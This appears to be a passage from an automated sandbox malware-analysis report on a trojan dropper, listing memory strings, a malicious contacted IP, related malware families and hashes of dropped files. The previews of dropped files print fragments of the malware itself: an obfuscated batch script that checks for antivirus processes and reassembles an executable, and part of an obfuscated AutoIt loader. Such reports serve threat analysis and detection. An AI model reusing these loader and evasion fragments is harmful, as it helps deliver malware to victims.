http://tempuri.org/Entity/Id18LR	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id16LR	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id8LR	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id14LR	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id6LR	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id18Response	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/	jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id12LR	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2004/08/addressing	jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id10LR	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id4LR	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id2LR	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id3Response	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/02/rm	jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage	jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id16Response	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id5Response	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence	jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/soap/actor/next	jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id14Response	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.67.231.189	unknown	Moldova Republic of		50673	SERVERIUS-ASNL	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1632796
Start date and time:	2025-03-09 07:23:15 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@24/6@1/1
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 100% Number of executed functions: 119 Number of non-executed functions: 294
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.199.214.10, 4.245.163.56
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target jsc.exe, PID 7576 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
01:24:13	API Interceptor	37x Sleep call for process: Rarissima.exe.pif modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SERVERIUS-ASNL	GIjkGXNvza.lnk	Get hash	malicious	Unknown	Browse	5.45.94.186
	DuAmp0SVGi.lnk	Get hash	malicious	Unknown	Browse	5.45.94.186
	nabsh4.elf	Get hash	malicious	Unknown	Browse	141.98.49.240
	https://era-info.com/gt/	Get hash	malicious	Unknown	Browse	5.255.81.100
	https://maya-lopez.filemail.com/t/XhcWEjoR	Get hash	malicious	Unknown	Browse	178.21.23.182
	https://maya-lopez.filemail.com/t/XhcWEjoR	Get hash	malicious	Unknown	Browse	178.21.23.181
	https://www.filemail.com/d/rxythqchkhluipl?skipreg=true	Get hash	malicious	Unknown	Browse	178.21.23.181
	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	141.98.34.116
	https://maya-lopez.filemail.com/t/BLFGBJSQ	Get hash	malicious	HTMLPhisher	Browse	178.21.23.181
	7kTWRqwrXx.exe	Get hash	malicious	Remcos	Browse	5.45.79.50

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\xBCzEiVyOcVH.dll	hfrR6WOIt6.exe	Get hash	malicious	Unknown	Browse
	services.png.exe	Get hash	malicious	AsyncRAT, Atmos, Citadel, Hancitor, StormKitty, WorldWind Stealer	Browse
	FgfPZQyCMj.exe	Get hash	malicious	Ramnit	Browse
	Jw1Ua7eGIy	Get hash	malicious	Unknown	Browse
	2019-09-02_22-41-10.exe	Get hash	malicious	SmokeLoader	Browse
	0di3x.exe	Get hash	malicious	SmokeLoader	Browse
	S17.exe	Get hash	malicious	Unknown	Browse
	S12.exe	Get hash	malicious	Unknown	Browse
	215.exe	Get hash	malicious	Unknown	Browse
	S4.exe	Get hash	malicious	Unknown	Browse
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Tt843YGUx5.exe	Get hash	malicious	Unknown	Browse
	Tt843YGUx5.exe	Get hash	malicious	Unknown	Browse
	in.exe	Get hash	malicious	DarkGate, MailPassView	Browse
	in.exe	Get hash	malicious	DarkGate, MailPassView	Browse
	KgpiJLs58m.exe	Get hash	malicious	DarkGate, MailPassView	Browse
	KgpiJLs58m.exe	Get hash	malicious	DarkGate, MailPassView	Browse
	Notion Setup 4.3.0 (4).exe	Get hash	malicious	DarkGate, MailPassView	Browse
	Notion Setup 4.3.0 (4).exe	Get hash	malicious	DarkGate, MailPassView	Browse
	JiH0aUfOU6.exe	Get hash	malicious	Unknown	Browse
	JiH0aUfOU6.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bel.tmp

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	893
Entropy (8bit):	5.684255693004386
Encrypted:	false
SSDEEP:	24:4NVDNVX6vy82MyjsukHMugCVeM1OOAvBcM2UByEgMWNS:4NJNVX6DfxsYlRAJZ2SdWNS
MD5:	8135BEF11F89A1DB48E677E5ACBE9356
SHA1:	A8C3E7E99ED4C818158D2308C951BE62C230852A
SHA-256:	81038FBD0689518CCA61189A6474D198792DBAABD7995A4FC8516A0BF054FE67
SHA-512:	FE4E3B6AC1AEEBB87667076F4EA79720C3C3C5E69D608DCB1CC874576B6E9D24BCFAC375924E27A8A238B146090FFD27AC3CEFF3B2D638F30E8A1024561073AA
Malicious:	false
Preview:	Set cPJmppTIOgHphOgIZlJIVQpIXRsFPuungjFRADw=waitfor /t 5 cPJmppTIOgHphOgIZlJIVQpIXRsFPuungjFRADw..Set eaXEAwrmiirPTMzarZyfbwOO=f..tasklist /FI "imagename eq BullGuardCore.exe" 2>NUL \| find /I /N "bullguardcore.exe">NUL..if %errorlevel%==0 waitfor /t 240 OcZPgqUdXdtleuHafcFzt..Set PtBtUqNxNHetrDEeOQTUhphog=Rarissima.exe.pif..Set OcZPgqUdXdtleuHafcFzt=M..tasklist /FI "imagename eq PSUAService.exe" 2>NUL \| find /I /N "psuaservice.exe">NUL..if %errorlevel%==0 Set PtBtUqNxNHetrDEeOQTUhphog=autoit.exe..<nul set /p = "%OcZPgqUdXdtleuHafcFzt%Z" > %PtBtUqNxNHetrDEeOQTUhphog%..%eaXEAwrmiirPTMzarZyfbwOO%indstr /V /R "^BMFIocnwPbapedepYbhWqofGZurIuQVJxjUhlGSmSVBHSStsfyboyoBzbYJwaQVYCIOPvPZsEOttGIOueLaqzNEjKBPjXRuwqCtptgVmuyDdrvMPlCYGbU$" Dici.tmp >> %PtBtUqNxNHetrDEeOQTUhphog%..%OcZPgqUdXdtleuHafcFzt%ove Inclina.* u..%PtBtUqNxNHetrDEeOQTUhphog% u..%cPJmppTIOgHphOgIZlJIVQpIXRsFPuungjFRADw%....

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Dici.tmp

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe
File Type:	data
Category:	dropped
Size (bytes):	893726
Entropy (8bit):	6.620349454630246
Encrypted:	false
SSDEEP:	12288:WpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:WT3E53Myyzl0hMf1tr7Caw8M01
MD5:	D0A3162FD1C18EE44BA155FF8F7A28D7
SHA1:	3C877E5E75467CB979F3075B251236F3FE35A3A9
SHA-256:	1C4B22529AD27409DA8FB7047CC534B1182FFB2859B3A01E57AB37A8C17916F0
SHA-512:	7D38648540BBDA9C4819A2BBB9B24BC1FAE3A7BB2ABD77807878CB2913A4F3977B7DA41027235DB9EFD08E7BF748823E68848BA68942B5BD0C38C63C8F7D381D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	BMFIocnwPbapedepYbhWqofGZurIuQVJxjUhlGSmSVBHSStsfyboyoBzbYJwaQVYCIOPvPZsEOttGIOueLaqzNEjKBPjXRuwqCtptgVmuyDdrvMPlCYGbU........................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B..........................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inclina.tmp

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1123298
Entropy (8bit):	6.0345840557815285
Encrypted:	false
SSDEEP:	12288:X+hywYPxhrL6e111PQj0ALw4DBySXPW736KIsAAsQBy4uggkZEZJs8Z9ZzusUsmG:HGe111PQj08FySXAuggdOS
MD5:	9CC422DC9F96787B5930E78750F05AC6
SHA1:	A6D1C7F8F80EAFE303CB834362E5D25E989D5CA7
SHA-256:	D0C14CCFCCB684A52437142AF6BB993DEB0839BA43091DF69A9F3E6B10DC2DCC
SHA-512:	33D37F08F1B27AB51784A99F2FEC23E9125235234FBAD4B491976BA5E2FB71AF5F4C97F80C640B213E897B0793E60E9047E7E1202AF69203A445342A49C21773
Malicious:	false
Preview:	$ADFxzgQ = FIKvAJS("120^67^89^117^113^70^90^112^98^79^106^106^107^85^113^107^102^116^104^99^98",0)..$rtuXmQb = 194..$paoYUBdOEheCL = 89..Do..Switch $rtuXmQb..Case 192..$emWZAYoGanEDtm = FIKvAJS("107^81^85^126",9), $JYybUPw = FIKvAJS("69^88^74^123^76^107^111",3), $meHCRxEdOMWao = FIKvAJS("113^70^99^107^102^66",1), $uNotfjGWhrhNdYErDEg = FIKvAJS("81^75^113^86^76^107^68^78^121",2)..$lmjOhbFwmIoAadPRStYUajaHZLVXfZJYrKFJcpuTvnvsa = 18..$lKTafmbBiXxBJJEReEATIOukbEfcoLVUdHerbFgEueuvzinptf = 473905+138273..While $lmjOhbFwmIoAadPRStYUajaHZLVXfZJYrKFJcpuTvnvsa < 30..$NvDHUKlezveAk = 40528+631884+524524..$emWZAYoGanEDtm = IsObj(105)..$lmjOhbFwmIoAadPRStYUajaHZLVXfZJYrKFJcpuTvnvsa = $lmjOhbFwmIoAadPRStYUajaHZLVXfZJYrKFJcpuTvnvsa + 1..WEnd..$rtuXmQb = $rtuXmQb + 1..Case 193..$VMFHJRduydSjNz = Execute(FIKvAJS("90^123^121^112^117^110^80^122^77^115^118^104^123^47^46^110^74^73^122^109^128^121^80^115^89^76^90^115^92^46^48",7))..$UGmPKDxtJKxTWvDDVwREdiOUQEEyLApguYiqwELLBIWXfXzK = 11..$DYssecpvFFMkfOvplcc

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	893608
Entropy (8bit):	6.620131693023677
Encrypted:	false
SSDEEP:	12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
MD5:	C56B5F0201A3B3DE53E561FE76912BFD
SHA1:	2A4062E10A5DE813F5688221DBEB3F3FF33EB417
SHA-256:	237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
SHA-512:	195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: Tt843YGUx5.exe, Detection: malicious, Browse Filename: Tt843YGUx5.exe, Detection: malicious, Browse Filename: in.exe, Detection: malicious, Browse Filename: in.exe, Detection: malicious, Browse Filename: KgpiJLs58m.exe, Detection: malicious, Browse Filename: KgpiJLs58m.exe, Detection: malicious, Browse Filename: Notion Setup 4.3.0 (4).exe, Detection: malicious, Browse Filename: Notion Setup 4.3.0 (4).exe, Detection: malicious, Browse Filename: JiH0aUfOU6.exe, Detection: malicious, Browse Filename: JiH0aUfOU6.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\u (copy)

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1123298
Entropy (8bit):	6.0345840557815285
Encrypted:	false
SSDEEP:	12288:X+hywYPxhrL6e111PQj0ALw4DBySXPW736KIsAAsQBy4uggkZEZJs8Z9ZzusUsmG:HGe111PQj08FySXAuggdOS
MD5:	9CC422DC9F96787B5930E78750F05AC6
SHA1:	A6D1C7F8F80EAFE303CB834362E5D25E989D5CA7
SHA-256:	D0C14CCFCCB684A52437142AF6BB993DEB0839BA43091DF69A9F3E6B10DC2DCC
SHA-512:	33D37F08F1B27AB51784A99F2FEC23E9125235234FBAD4B491976BA5E2FB71AF5F4C97F80C640B213E897B0793E60E9047E7E1202AF69203A445342A49C21773
Malicious:	false
